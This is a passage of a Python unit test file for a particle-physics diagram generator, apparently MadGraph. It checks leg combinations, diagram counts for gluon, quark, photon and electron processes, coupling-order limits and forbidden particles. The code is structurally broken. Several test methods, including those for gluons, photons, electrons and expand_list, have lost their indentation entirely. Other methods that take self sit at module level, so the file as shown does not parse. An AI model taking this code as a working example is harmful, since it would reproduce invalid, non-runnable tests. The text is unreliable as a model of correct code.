                      'couplings':{(0, 0):'GQED'},
                      'orders':{'QED':1}}))
        self.mymodel.set('particles', self.mypartlist)
        self.mymodel.set('interactions', self.myinterlist)
        # Index 0: combinations annihilating to zero legs; index 1: to one leg.
        self.ref_dict_to0 = self.myinterlist.generate_ref_dict()[0]
        self.ref_dict_to1 = self.myinterlist.generate_ref_dict()[1]
    def test_combine_legs_gluons(self):
        """Test combine_legs and merge_comb_legs: gg>gg

        The expected lists below are order-sensitive: they must match the
        exact enumeration order produced by combine_legs/merge_comb_legs.
        """
        # Four gluon legs with two initial state
        myleglist = base_objects.LegList([base_objects.Leg({'id':21,
                                          'number':num,
                                          'state':True}) \
                                          for num in range(1, 5)])
        myleglist[0].set('state', False)
        myleglist[1].set('state', False)
        l1 = myleglist[0]
        l2 = myleglist[1]
        l3 = myleglist[2]
        l4 = myleglist[3]
        # All possibilities for the first combination
        goal_combined_legs = [
                [(l1, l2), l3, l4], [(l1, l2), (l3, l4)],
                [(l1, l3), l2, l4], [(l1, l3), (l2, l4)],
                [(l1, l4), l2, l3], [(l1, l4), (l2, l3)],
                [l1, (l2, l3), l4], [l1, (l2, l4), l3], [l1, l2, (l3, l4)],
                [(l1, l2, l3), l4], [(l1, l2, l4), l3],
                [(l1, l3, l4), l2], [l1, (l2, l3, l4)]
                ]
        combined_legs = self.myamplitude.combine_legs(
                                              [leg for leg in myleglist],
                                              self.ref_dict_to1,
                                              3)
        self.assertEqual(combined_legs, goal_combined_legs)
        # Now test the reduction of legs for this
        reduced_list = self.myamplitude.merge_comb_legs(combined_legs,
                                                        self.ref_dict_to1)
        # Remaining legs should be from_group False
        l1.set('from_group', False)
        l2.set('from_group', False)
        l3.set('from_group', False)
        l4.set('from_group', False)
        # Define all possible legs obtained after merging combinations
        l12 = base_objects.Leg({'id':21,
                                'number':1,
                                'state':True})
        l13 = base_objects.Leg({'id':21,
                                'number':1,
                                'state':False})
        l14 = base_objects.Leg({'id':21,
                                'number':1,
                                'state':False})
        l23 = base_objects.Leg({'id':21,
                                'number':2,
                                'state':False})
        l24 = base_objects.Leg({'id':21,
                                'number':2,
                                'state':False})
        l34 = base_objects.Leg({'id':21,
                                'number':3,
                                'state':True})
        l123 = base_objects.Leg({'id':21,
                                 'number':1,
                                 'state':True})
        l124 = base_objects.Leg({'id':21,
                                 'number':1,
                                 'state':True})
        l134 = base_objects.Leg({'id':21,
                                 'number':1,
                                 'state':False})
        l234 = base_objects.Leg({'id':21,
                                 'number':2,
                                 'state':False})
        # Associated vertices
        vx12 = base_objects.Vertex({'legs':base_objects.LegList([l1, l2, l12]), 'id': 1})
        vx13 = base_objects.Vertex({'legs':base_objects.LegList([l1, l3, l13]), 'id': 1})
        vx14 = base_objects.Vertex({'legs':base_objects.LegList([l1, l4, l14]), 'id': 1})
        vx23 = base_objects.Vertex({'legs':base_objects.LegList([l2, l3, l23]), 'id': 1})
        vx24 = base_objects.Vertex({'legs':base_objects.LegList([l2, l4, l24]), 'id': 1})
        vx34 = base_objects.Vertex({'legs':base_objects.LegList([l3, l4, l34]), 'id': 1})
        vx123 = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l2, l3, l123]), 'id': 2})
        vx124 = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l2, l4, l124]), 'id': 2})
        vx134 = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l3, l4, l134]), 'id': 2})
        vx234 = base_objects.Vertex(
            {'legs':base_objects.LegList([l2, l3, l4, l234]), 'id': 2})
        # The final object which should be produced by merge_comb_legs
        goal_reduced_list = [\
                (base_objects.LegList([l12, l3, l4]), \
                 base_objects.VertexList([vx12])), \
                (base_objects.LegList([l12, l34]), \
                 base_objects.VertexList([vx12, \
                                          vx34])), \
                (base_objects.LegList([l13, l2, l4]), \
                 base_objects.VertexList([vx13])), \
                (base_objects.LegList([l13, l24]), \
                 base_objects.VertexList([vx13, \
                                          vx24])), \
                (base_objects.LegList([l14, l2, l3]), \
                 base_objects.VertexList([vx14])), \
                (base_objects.LegList([l14, l23]), \
                 base_objects.VertexList([vx14, \
                                          vx23])), \
                (base_objects.LegList([l1, l23, l4]), \
                 base_objects.VertexList([vx23])), \
                (base_objects.LegList([l1, l24, l3]), \
                 base_objects.VertexList([vx24])), \
                (base_objects.LegList([l1, l2, l34]), \
                 base_objects.VertexList([vx34])), \
                (base_objects.LegList([l123, l4]), \
                 base_objects.VertexList([vx123])), \
                (base_objects.LegList([l124, l3]), \
                 base_objects.VertexList([vx124])), \
                (base_objects.LegList([l134, l2]), \
                 base_objects.VertexList([vx134])), \
                (base_objects.LegList([l1, l234]), \
                 base_objects.VertexList([vx234])), \
                ]
        self.assertEqual(reduced_list, goal_reduced_list)
    def test_combine_legs_uux_ddx(self):
        """Test combine_legs and merge_comb_legs: uu~>dd~

        Each quark pair can merge to either a gluon (QCD vertex) or a
        photon (QED vertex), so the reduced list enumerates both options.
        """
        myleglist = base_objects.LegList()
        myleglist.append(base_objects.Leg({'id':-2,
                                           'number':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':2,
                                           'number':2,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'number':3,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':-1,
                                           'number':4,
                                           'state':True}))
        l1 = myleglist[0]
        l2 = myleglist[1]
        l3 = myleglist[2]
        l4 = myleglist[3]
        my_combined_legs = [\
                [(l1, l2), l3, l4], [(l1, l2), (l3, l4)], \
                [l1, l2, (l3, l4)] \
                ]
        combined_legs = self.myamplitude.combine_legs(
                                              [leg for leg in myleglist],
                                              self.ref_dict_to1, 3)
        self.assertEqual(combined_legs, my_combined_legs)
        reduced_list = self.myamplitude.merge_comb_legs(combined_legs,
                                                        self.ref_dict_to1)
        l1.set('from_group', False)
        l2.set('from_group', False)
        l3.set('from_group', False)
        l4.set('from_group', False)
        l12glue = base_objects.Leg({'id':21,
                                    'number':1,
                                    'state':True})
        l12phot = base_objects.Leg({'id':22,
                                    'number':1,
                                    'state':True})
        l34glue = base_objects.Leg({'id':21,
                                    'number':3,
                                    'state':True})
        l34phot = base_objects.Leg({'id':22,
                                    'number':3,
                                    'state':True})
        vx12glue = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l2, l12glue]), 'id':3})
        vx12phot = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l2, l12phot]), 'id':4})
        vx34glue = base_objects.Vertex(
            {'legs':base_objects.LegList([l3, l4, l34glue]), 'id':5})
        vx34phot = base_objects.Vertex(
            {'legs':base_objects.LegList([l3, l4, l34phot]), 'id':6})
        my_reduced_list = [\
                (base_objects.LegList([l12glue, l3, l4]),
                 base_objects.VertexList([vx12glue])),
                (base_objects.LegList([l12phot, l3, l4]),
                 base_objects.VertexList([vx12phot])),
                (base_objects.LegList([l12glue, l34glue]),
                 base_objects.VertexList([vx12glue, vx34glue])),
                (base_objects.LegList([l12glue, l34phot]),
                 base_objects.VertexList([vx12glue, vx34phot])),
                (base_objects.LegList([l12phot, l34glue]),
                 base_objects.VertexList([vx12phot, vx34glue])),
                (base_objects.LegList([l12phot, l34phot]),
                 base_objects.VertexList([vx12phot, vx34phot])),
                (base_objects.LegList([l1, l2, l34glue]),
                 base_objects.VertexList([vx34glue])),
                (base_objects.LegList([l1, l2, l34phot]),
                 base_objects.VertexList([vx34phot])),
                ]
        self.assertEqual(reduced_list, my_reduced_list)
    def test_combine_legs_uux_uuxuux(self):
        """Test combine_legs: uu~>uu~uu~

        Only the enumeration of leg combinations is checked here; the
        expected list is order-sensitive.
        """
        myleglist = base_objects.LegList()
        myleglist.append(base_objects.Leg({'id':-2,
                                           'number':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':2,
                                           'number':2,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':2,
                                           'number':3,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':-2,
                                           'number':4,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':2,
                                           'number':5,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':-2,
                                           'number':6,
                                           'state':True}))
        l1 = myleglist[0]
        l2 = myleglist[1]
        l3 = myleglist[2]
        l4 = myleglist[3]
        l5 = myleglist[4]
        l6 = myleglist[5]
        my_combined_legs = [\
                [(l1, l2), l3, l4, l5, l6], [(l1, l2), (l3, l4), l5, l6],
                [(l1, l2), (l3, l4), (l5, l6)], [(l1, l2), (l3, l6), l4, l5],
                [(l1, l2), (l3, l6), (l4, l5)], [(l1, l2), l3, (l4, l5), l6],
                [(l1, l2), l3, l4, (l5, l6)],
                [(l1, l3), l2, l4, l5, l6], [(l1, l3), (l2, l4), l5, l6],
                [(l1, l3), (l2, l4), (l5, l6)], [(l1, l3), (l2, l6), l4, l5],
                [(l1, l3), (l2, l6), (l4, l5)], [(l1, l3), l2, (l4, l5), l6],
                [(l1, l3), l2, l4, (l5, l6)],
                [(l1, l5), l2, l3, l4, l6], [(l1, l5), (l2, l4), l3, l6],
                [(l1, l5), (l2, l4), (l3, l6)], [(l1, l5), (l2, l6), l3, l4],
                [(l1, l5), (l2, l6), (l3, l4)], [(l1, l5), l2, (l3, l4), l6],
                [(l1, l5), l2, (l3, l6), l4],
                [l1, (l2, l4), l3, l5, l6], [l1, (l2, l4), (l3, l6), l5],
                [l1, (l2, l4), l3, (l5, l6)],
                [l1, (l2, l6), l3, l4, l5], [l1, (l2, l6), (l3, l4), l5],
                [l1, (l2, l6), l3, (l4, l5)],
                [l1, l2, (l3, l4), l5, l6], [l1, l2, (l3, l4), (l5, l6)],
                [l1, l2, (l3, l6), l4, l5], [l1, l2, (l3, l6), (l4, l5)],
                [l1, l2, l3, (l4, l5), l6],
                [l1, l2, l3, l4, (l5, l6)]
                ]
        combined_legs = self.myamplitude.combine_legs(
                                              [leg for leg in myleglist],
                                              self.ref_dict_to1, 3)
        self.assertEqual(combined_legs, my_combined_legs)
def test_diagram_generation_gluons(self):
"""Test the number of diagram generated for gg>ng with n up to 4"""
goal_ndiags = [1, 4, 25, 220, 2485, 34300]
# Test 1,2,3 and 4 gluons in the final state
for ngluon in range (1, 4):
# Create the amplitude
myleglist = base_objects.LegList([base_objects.Leg({'id':21,
'state':False})] * 2)
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluon)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QCD':ngluon},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d gluons: %d" % (ngluon,
ndiags))
self.assertEqual(ndiags, goal_ndiags[ngluon - 1])
def test_diagram_generation_uux_gg(self):
"""Test the number of diagram generated for uu~>gg (s, t and u channels)
"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')), 3)
def test_diagram_generation_uux_uuxng(self):
"""Test the number of diagram generated for uu~>uu~+ng with n up to 2
"""
goal_ndiags = [4, 18, 120, 1074, 12120]
for ngluons in range(0, 3):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags[ngluons])
def test_diagram_generation_uux_ddxng(self):
"""Test the number of diagram generated for uu~>dd~+ng with n up to 2
"""
goal_ndiags = [2, 9, 60, 537, 6060]
for ngluons in range(0, 3):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags[ngluons])
    def test_diagram_generation_diagrams_ddx_uuxg(self):
        """Test the vertex list output for dd~>uu~g (so far only 2
        diagrams, due to lack of time)
        """
        myleglist = base_objects.LegList()
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':False,
                                           'number': 1}))
        myleglist.append(base_objects.Leg({'id':-1,
                                           'state':False,
                                           'number': 2}))
        myleglist.append(base_objects.Leg({'id':-2,
                                           'state':True,
                                           'number': 3}))
        myleglist.append(base_objects.Leg({'id':2,
                                           'state':True,
                                           'number': 4}))
        myleglist.append(base_objects.Leg({'id':21,
                                           'state':True,
                                           'number': 5}))
        myproc = base_objects.Process({'legs':myleglist,
                                       'model':self.mymodel})
        self.myamplitude.set('process', myproc)
        self.myamplitude.generate_diagrams()
        mydiagrams = self.myamplitude.get('diagrams')
        # Normalize from_group so the hand-built goal diagrams compare equal.
        for leg in myleglist:
            leg.set('from_group', True)
        l1 = myleglist[0]
        l2 = myleglist[1]
        l3 = myleglist[2]
        l4 = myleglist[3]
        l5 = myleglist[4]
        # Incoming legs are flipped to their antiparticles, mirroring what
        # diagram generation does to initial-state legs.
        l1.set('id',
               self.mymodel.get('particle_dict')[l1.get('id')].get_anti_pdg_code())
        l2.set('id',
               self.mymodel.get('particle_dict')[l2.get('id')].get_anti_pdg_code())
        l12glue = base_objects.Leg({'id':21,
                                    'number':1,
                                    'state':True})
        l34glue = base_objects.Leg({'id':21,
                                    'number':3,
                                    'state':True})
        l35 = base_objects.Leg({'id':-2,
                                'number':3,
                                'state':True})
        vx12glue = base_objects.Vertex(
            {'legs':base_objects.LegList([l1, l2, l12glue]), 'id':5})
        vx34glue = base_objects.Vertex(
            {'legs':base_objects.LegList([l3, l4, l34glue]), 'id':3})
        vx12glue34glue5 = base_objects.Vertex(
            {'legs':base_objects.LegList([l12glue, l34glue, l5]), 'id':1})
        vx35 = base_objects.Vertex(
            {'legs':base_objects.LegList([l3, l5, l35]), 'id':3})
        vx12glue354 = base_objects.Vertex(
            {'legs':base_objects.LegList([l12glue, l35, l4]), 'id':3})
        goaldiagrams = base_objects.DiagramList([\
            base_objects.Diagram({'vertices': base_objects.VertexList(\
                                  [vx12glue, vx34glue, vx12glue34glue5]),
                                  'orders':{'QED':0, 'QCD':3, 'WEIGHTED':3}}),
            base_objects.Diagram({'vertices': base_objects.VertexList(\
                                  [vx12glue, vx35, vx12glue354]),
                                  'orders':{'QED':0, 'QCD':3, 'WEIGHTED':3}})\
            ])
        # Normalize from_group on the generated diagrams as well before
        # comparing only the first two diagrams against the goal.
        for diagram in mydiagrams:
            for vertex in diagram.get('vertices'):
                for leg in vertex.get('legs'):
                    leg.set('from_group', True)
        self.assertEqual(goaldiagrams[0:2], mydiagrams[0:2])
def test_diagram_generation_nodiag(self):
"""Test charge violating processes give 0 diagram
"""
for nquarks in range(1, 5):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':1,
'state':True})] * nquarks)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.assertRaises(InvalidCmd, self.myamplitude.generate_diagrams)
self.assertEqual(len(self.myamplitude.get('diagrams')), 0)
def test_diagram_generation_photons(self):
"""Test the number of diagram generated for uu~>na with n up to 6"""
# Test up to 5 photons in the final state
for nphot in range (1, 5):
# Create the amplitude
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.extend([base_objects.Leg({'id':22,
'state':True})] * nphot)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QED':nphot},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d photons: %d" % (nphot,
ndiags))
self.assertEqual(ndiags, math.factorial(nphot))
def test_diagram_generation_electrons(self):
"""Test the number of diagram generated for e+e->n(e+e-) with n up to 3
"""
goal_ndiags = [2, 36, 1728]
for npairs in range (1, 3):
# Create the amplitude
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-11,
'state':False}))
myleglist.append(base_objects.Leg({'id':11,
'state':False}))
myleglist.extend([base_objects.Leg({'id':11,
'state':True}),
base_objects.Leg({'id':-11,
'state':True})] * npairs)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QED':npairs * 2},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d electron pairs: %d" % \
(npairs, ndiags))
self.assertEqual(ndiags, goal_ndiags[npairs - 1])
def test_expand_list(self):
"""Test the expand_list function"""
mylist = [[1, 2], 3, [4, 5]]
goal_list = [[1, 3, 4], [1, 3, 5], [2, 3, 4], [2, 3, 5]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
# Also test behavior with singlets like [1]
mylist = [1, [2]]
goal_list = [[1, 2]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
mylist = [[1]]
self.assertEqual(diagram_generation.expand_list(mylist), mylist)
mylist = [[1, 2], [3]]
goal_list = [[1, 3], [2, 3]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
def test_expand_list_list(self):
"""Test the expand_list_list function"""
mylist = [ [1, 2], [[3, 4], [5, 6]] ]
goal_list = [[1, 2, 3, 4], [1, 2, 5, 6]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [5] ]
goal_list = [[1, 2, 5], [3, 4, 5]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [[6, 7], [8, 9]] ]
goal_list = [[1, 2, 6, 7], [1, 2, 8, 9], [3, 4, 6, 7], [3, 4, 8, 9]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [5], [[6, 7], [8, 9]] ]
goal_list = [[1, 2, 5, 6, 7], [1, 2, 5, 8, 9], [3, 4, 5, 6, 7],
[3, 4, 5, 8, 9]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
    def test_diagram_generation_ue_dve(self):
        """Test the number of diagram generated for ue->dve (t channel)

        Builds a self-contained electroweak toy model (u, d, e, nu_e, W)
        rather than reusing self.mymodel, which has no W couplings.
        """
        mypartlist = base_objects.ParticleList();
        myinterlist = base_objects.InteractionList();
        # A quark U and its antiparticle
        # NOTE(review): '\bar u' contains the '\b' (backspace) escape; a raw
        # string r'\bar u' was probably intended — confirm.
        mypartlist.append(base_objects.Particle({'name':'u',
                  'antiname':'u~',
                  'spin':2,
                  'color':3,
                  'mass':'zero',
                  'width':'zero',
                  'texname':'u',
                  'antitexname':'\bar u',
                  'line':'straight',
                  'charge':2. / 3.,
                  'pdg_code':2,
                  'propagating':True,
                  'is_part':True,
                  'self_antipart':False}))
        u = mypartlist[len(mypartlist) - 1]
        antiu = copy.copy(u)
        antiu.set('is_part', False)
        # A quark D and its antiparticle
        mypartlist.append(base_objects.Particle({'name':'d',
                  'antiname':'d~',
                  'spin':2,
                  'color':3,
                  'mass':'zero',
                  'width':'zero',
                  'texname':'d',
                  'antitexname':'\bar d',
                  'line':'straight',
                  'charge':-1. / 3.,
                  'pdg_code':1,
                  'propagating':True,
                  'is_part':True,
                  'self_antipart':False}))
        d = mypartlist[len(mypartlist) - 1]
        antid = copy.copy(d)
        antid.set('is_part', False)
        # A electron and positron
        mypartlist.append(base_objects.Particle({'name':'e+',
                  'antiname':'e-',
                  'spin':2,
                  'color':1,
                  'mass':'zero',
                  'width':'zero',
                  'texname':'e^+',
                  'antitexname':'e^-',
                  'line':'straight',
                  'charge':-1.,
                  'pdg_code':11,
                  'propagating':True,
                  'is_part':True,
                  'self_antipart':False}))
        eminus = mypartlist[len(mypartlist) - 1]
        eplus = copy.copy(eminus)
        eplus.set('is_part', False)
        # nu_e
        # NOTE(review): '\nu_e' begins with the '\n' (newline) escape and
        # '\bar\nu_e' contains '\b' — raw strings were likely intended.
        mypartlist.append(base_objects.Particle({'name':'ve',
                  'antiname':'ve~',
                  'spin':2,
                  'color':0,
                  'mass':'zero',
                  'width':'zero',
                  'texname':'\nu_e',
                  'antitexname':'\bar\nu_e',
                  'line':'straight',
                  'charge':0.,
                  'pdg_code':12,
                  'propagating':True,
                  'is_part':True,
                  'self_antipart':False}))
        nue = mypartlist[len(mypartlist) - 1]
        nuebar = copy.copy(nue)
        nuebar.set('is_part', False)
        # W
        mypartlist.append(base_objects.Particle({'name':'w+',
                  'antiname':'w-',
                  'spin':3,
                  'color':0,
                  'mass':'WMASS',
                  'width':'WWIDTH',
                  'texname':'W^+',
                  'antitexname':'W^-',
                  'line':'wavy',
                  'charge':1.,
                  'pdg_code':24,
                  'propagating':True,
                  'is_part':True,
                  'self_antipart':False}))
        wplus = mypartlist[len(mypartlist) - 1]
        wminus = copy.copy(wplus)
        wminus.set('is_part', False)
        # Coupling of u and d to W
        myinterlist.append(base_objects.Interaction({
                  'id': 8,
                  'particles': base_objects.ParticleList(\
                                        [antid, \
                                         u, \
                                         wminus]),
                  'color': [],
                  'lorentz':['L1'],
                  'couplings':{(0, 0):'GQED'},
                  'orders':{'QED':1}}))
        # Coupling of d and u to W
        myinterlist.append(base_objects.Interaction({
                  'id': 9,
                  'particles': base_objects.ParticleList(\
                                        [antiu, \
                                         d, \
                                         wplus]),
                  'color': [],
                  'lorentz':['L1'],
                  'couplings':{(0, 0):'GQED'},
                  'orders':{'QED':1}}))
        # Coupling of e- and nu_e to W
        myinterlist.append(base_objects.Interaction({
                  'id': 10,
                  'particles': base_objects.ParticleList(\
                                        [nuebar, \
                                         eminus, \
                                         wplus]),
                  'color': [],
                  'lorentz':['L1'],
                  'couplings':{(0, 0):'GQED'},
                  'orders':{'QED':1}}))
        # Coupling of nu_e and e+ to W
        myinterlist.append(base_objects.Interaction({
                  'id': 11,
                  'particles': base_objects.ParticleList(\
                                        [eplus, \
                                         nue, \
                                         wminus]),
                  'color': [],
                  'lorentz':['L1'],
                  'couplings':{(0, 0):'GQED'},
                  'orders':{'QED':1}}))
        mymodel = base_objects.Model()
        mymodel.set('particles', mypartlist)
        mymodel.set('interactions', myinterlist)
        myleglist = base_objects.LegList()
        myleglist.append(base_objects.Leg({'id':2,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':11,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':12,
                                           'state':True}))
        myproc = base_objects.Process({'legs':myleglist,
                                       'model':mymodel})
        myamplitude = diagram_generation.Amplitude()
        myamplitude.set('process', myproc)
        # NOTE(review): generate_diagrams() is never called explicitly here;
        # this relies on get('diagrams') generating them lazily — confirm.
        self.assertEqual(len(myamplitude.get('diagrams')), 1)
def test_coupling_orders_uux_ddxng(self):
    """Test the number of diagrams uu~>dd~+ng with different QCD
    and QED coupling orders
    """
    # Expected diagram counts, indexed by the number of extra gluons,
    # for each set of maximum coupling orders.
    cases = [({'QED': 2, 'QCD': 0}, [1, 0, 0]),
             ({'QED': 0, 'QCD': 2}, [1, 0, 0]),
             ({'QED': 2, 'QCD': 1}, [1, 4, 0]),
             ({'QED': 2, 'QCD': 2}, [2, 4, 24]),
             ({'QED': 0, 'QCD': 4}, [1, 5, 36])]
    for ngluons in range(3):
        # Build the u u~ > d d~ + ngluons g leg list.
        legs = base_objects.LegList()
        for pdg, is_final in [(-1, False), (1, False), (-2, True), (2, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        for max_orders, goals in cases:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'orders': dict(max_orders)})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[ngluons])
def test_squared_orders_constraints_uux_ddxuux(self):
    """ Tests that the various possible squared order constraints are
    correctly treated at LO."""
    # Build the six-leg process once; it is shared by all constraint sets.
    legs = base_objects.LegList()
    for pdg, is_final in [(2, False), (-2, False), (1, True),
                          (-1, True), (2, True), (-2, True)]:
        legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
    # Each entry: (amplitude orders, squared orders,
    #              squared-order comparison types, expected #diagrams).
    SO_tests = [({}, {}, {}, 50),
                ({}, {'QED': -1}, {'QED': '=='}, 14),
                ({}, {'QED': -2}, {'QED': '=='}, 38),
                ({}, {'QED': -3}, {'QED': '=='}, 50),
                ({}, {'QED': -4}, {'QED': '=='}, 36),
                ({}, {'QED': -5}, {'QED': '=='}, 12),
                ({}, {'QED': -6}, {'QED': '=='}, 0),
                ({}, {'QCD': 4}, {'QCD': '>'}, 38),
                ({}, {'QCD': 2}, {'QCD': '<='}, 36),
                ({}, {'QED': 2, 'QCD': 4}, {'QED': '==', 'QCD': '>'}, 38),
                ({'QCD': 2}, {'QED': 4, 'QCD': 4},
                 {'QED': '<=', 'QCD': '<='}, 24)]
    for amp_orders, sq_orders, sq_types, expected in SO_tests:
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'orders': amp_orders,
                                       'squared_orders': sq_orders,
                                       'sqorders_types': sq_types})
        self.myamplitude.set('process', myproc)
        self.myamplitude.generate_diagrams()
        self.assertEqual(len(self.myamplitude.get('diagrams')), expected)
def test_forbidden_particles_uux_uuxng(self):
    """Test the number of diagrams uu~>uu~+g with different
    forbidden particles.
    """
    goal_no_photon = [2, 10]
    goal_no_photon_quark = [2, 2]
    for ngluons in range(2):
        legs = base_objects.LegList()
        for pdg, is_final in [(-1, False), (1, False), (-1, True), (1, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        # Forbid the photon alone, then the photon and the quark.
        for forbidden, goals in [([22], goal_no_photon),
                                 ([22, 1], goal_no_photon_quark)]:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'forbidden_particles': forbidden})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[ngluons])
def test_forbidden_onshell_s_channel_uux_uuxng(self):
    """Test diagram generation with forbidden onshell s-channel particles.
    """
    goal_no_photon = [4, 18]
    photon_none = [{1: [0]}, {2: [0], 4: [0], 13: [1], 17: [1]}]
    goal_no_quark = [2, 6]
    quark_none = [{0: [0]}, {0: [0, 1], 1: [0, 1], 3: [1], 5: [1]}]
    goal_no_antiquark = [2, 6]
    antiquark_none = [{}, {}]

    def check_onshell_flags(diagrams, none_map):
        # In diagrams listed in none_map, the vertices given there must
        # carry onshell == False on their last leg and every other vertex
        # must carry None; diagrams not listed must contain no leg
        # explicitly flagged onshell == False.
        for idiag, diagram in enumerate(diagrams):
            if idiag in none_map:
                for ivert, vertex in enumerate(diagram.get('vertices')):
                    last_leg = vertex.get('legs')[-1]
                    if ivert in none_map[idiag]:
                        self.assertEqual(False, last_leg.get('onshell'))
                    else:
                        self.assertEqual(None, last_leg.get('onshell'))
            else:
                self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False
                                      for vert in diagram.get('vertices')]))

    for ngluons in range(2):
        legs = base_objects.LegList()
        for pdg, is_final in [(-1, False), (1, False), (-1, True), (1, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'forbidden_onsh_s_channels': [22]})
        self.myamplitude.set('process', myproc)
        self.myamplitude.generate_diagrams()
        self.assertEqual(len(self.myamplitude.get('diagrams')),
                         goal_no_photon[ngluons])
        check_onshell_flags(self.myamplitude.get('diagrams'),
                            photon_none[ngluons])
        # Test with u a > u a (+ g)
        legs = base_objects.LegList()
        for pdg, is_final in [(1, False), (22, False), (1, True), (22, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'forbidden_onsh_s_channels': [1]})
        self.myamplitude.set('process', myproc)
        self.myamplitude.generate_diagrams()
        self.assertEqual(len(self.myamplitude.get('diagrams')),
                         goal_no_quark[ngluons])
        check_onshell_flags(self.myamplitude.get('diagrams'),
                            quark_none[ngluons])
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'forbidden_onsh_s_channels': [-1]})
        self.myamplitude.set('process', myproc)
